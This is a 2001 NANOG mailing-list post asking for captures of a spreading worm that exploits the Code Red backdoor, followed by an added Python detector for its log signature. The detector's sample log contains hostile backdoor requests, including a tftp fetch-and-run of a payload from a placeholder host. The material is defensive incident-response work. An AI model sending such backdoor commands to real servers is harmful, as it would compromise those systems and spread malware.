[42608] in North American Network Operators' Group


Re: Worm probes.. Looking for captures.

daemon@ATHENA.MIT.EDU (Michael Airhart)
Tue Sep 18 13:10:28 2001

Message-Id: <4.3.2.7.2.20010918114802.01c65730@171.68.224.210>
Date: Tue, 18 Sep 2001 11:49:34 -0500
To: nanog@merit.edu
From: Michael Airhart <mairhart@cisco.com>
In-Reply-To: <20010918115439.A16468@roxanne.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Errors-To: owner-nanog-outgoing@merit.edu


Folks,

If anyone has a packet capture of the infection in progress, would you 
please contact me.  I would like to get it to the some of the Cisco IOS 
folks ASAP.  (Not my official job, but would like to help.)

Thanks!!

Michael Airhart


At 11:54 AM 9/18/2001 -0400, Eric Gauthier wrote:

> > Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
> > I've nailed a copy, and am working on getting it to the right security
> > people.  A *PRELIMINARY* (eyeballing the output of 'strings' indicates that
> > this one *both* sends itself via email a la SirCam, *AND* scans for vulnerable
> > web servers, and if it finds a vulnerable server, it causes anybody visiting
> > that webpage to be offered a contaminated .exe as well.
> > I do *NOT* have a handle on what malicious effects it has other than just
> > propagating.
>
>I work at a large university and our security guys think this guy is what's
>been causing us problems all morning.  Lots of subnet scans (tons of
>incomplete arps), CC Mail servers are wacking out, HPOV noting that
>old 3Com gear is dropping etc.  This is what I've heard through the rumor
>mill (so take it with a grain of salt)...
>
>"...At first blush, it spreads itself via the web, email, and maybe shares.
>We've seen it spreading by a set of two HTTP requests.  It will look for
>backdoors left behind by Code Red, such as /scripts/root.exe.  It uses tftp
>to copy itself to the target machine then launches it via a second HTTP
>command."
>
>Eric :)

--------------------------------------------------------------------------------------------------------
Michael Airhart				512/378-1246 Office
Consulting Systems Engineer			413/480-1958 eFax
Cisco Systems, Inc.				800/365-4578 Pager
12515 Research Blvd				mairhart@cisco.com
Austin, TX 78759
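The two-request pattern in the quoted report (hit the Code Red backdoor at /scripts/root.exe, pull the worm body over tftp, then launch it with a second request through the same backdoor) leaves a recognisable trail in ordinary web-server access logs, which is something an operator can grep while a full packet capture is still being hunted down. The script below is an added example, not code from this thread or from Cisco: the log lines are constructed, the 172.16.x.x / 10.x.x.x addresses and the file name payload.exe are placeholders, and the Windows tftp client syntax it matches (tftp -i host GET file) is an assumption of the example rather than something the report states.

```python
"""Flag the backdoor -> tftp fetch -> launch sequence in access logs.

Added example; the sample log and the names in it are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

# One access-log line in common log format:
#   client - - [timestamp] "METHOD path HTTP/x.y" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Backdoor left behind by Code Red that the report says the worm looks for.
BACKDOOR_PATH = "/scripts/root.exe"

# Assumed Windows tftp client syntax: tftp [-i] <host> GET <remote> [<local>]
TFTP_RE = re.compile(r'tftp\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<file>\S+)', re.I)


def decode_request(path):
    """Split a request target into (base path, decoded query), resolving
    %xx escapes and IIS-style '+' separators so commands can be matched."""
    base, _, query = path.partition('?')
    return base, unquote(query).replace('+', ' ')


def classify(path):
    """Map one request target to a propagation stage, or None if unrelated.
    'probe'      - bare hit on the backdoor path (checking that it exists)
    'tftp_fetch' - backdoor used to run tftp and pull a file onto the host
    'command'    - backdoor used to run anything else; after a tftp_fetch
                   this is the second request that launches the copied file
    """
    base, query = decode_request(path)
    if base.lower() != BACKDOOR_PATH:
        return None
    if not query.strip():
        return 'probe'
    if TFTP_RE.search(query):
        return 'tftp_fetch'
    return 'command'


def tftp_source(path):
    """Return the host the backdoor was told to tftp from, or None."""
    _, query = decode_request(path)
    m = TFTP_RE.search(query)
    return m['host'] if m else None


def find_propagation(lines):
    """Return {client_ip: {'stages': [...], 'tftp_source': host}} for every
    client that fetched a file through the backdoor over tftp and then sent
    a further command through it: the two-request pattern in the report."""
    per_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stage = classify(m['path'])
        if stage:
            per_client[m['ip']].append((stage, m['path']))

    hits = {}
    for ip, events in per_client.items():
        stages = [s for s, _ in events]
        if 'tftp_fetch' not in stages:
            continue
        first_fetch = stages.index('tftp_fetch')
        if 'command' in stages[first_fetch + 1:]:
            hits[ip] = {
                'stages': stages,
                'tftp_source': tftp_source(events[first_fetch][1]),
            }
    return hits


# Constructed sample log; addresses and "payload.exe" are placeholders.
SAMPLE_LOG = [
    '172.16.5.9 - - [18/Sep/2001:10:02:11 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 -',
    '172.16.5.9 - - [18/Sep/2001:10:02:12 -0500] "GET /scripts/root.exe?/c+tftp%20-i%20172.16.5.9%20GET%20payload.exe HTTP/1.0" 200 -',
    '172.16.5.9 - - [18/Sep/2001:10:02:15 -0500] "GET /scripts/root.exe?/c+payload.exe HTTP/1.0" 200 -',
    '10.0.0.3 - - [18/Sep/2001:10:05:00 -0500] "GET /index.html HTTP/1.0" 200 1234',
    '10.0.0.7 - - [18/Sep/2001:10:06:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -',
]

if __name__ == '__main__':
    for ip, info in find_propagation(SAMPLE_LOG).items():
        print(ip, info['stages'], 'fetched body from', info['tftp_source'])
```

Only clients that complete the tftp stage and then issue another command through the backdoor are reported; a lone probe of /scripts/root.exe (the 10.0.0.7 line, which the server answered with a 404) is classified but not flagged, since on its own it only says the scanner visited, not that the host was infected. The tftp source address the worm hands to the backdoor is worth keeping: it is the already-infected machine, which is where a capture of the infection in progress would have to be taken.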

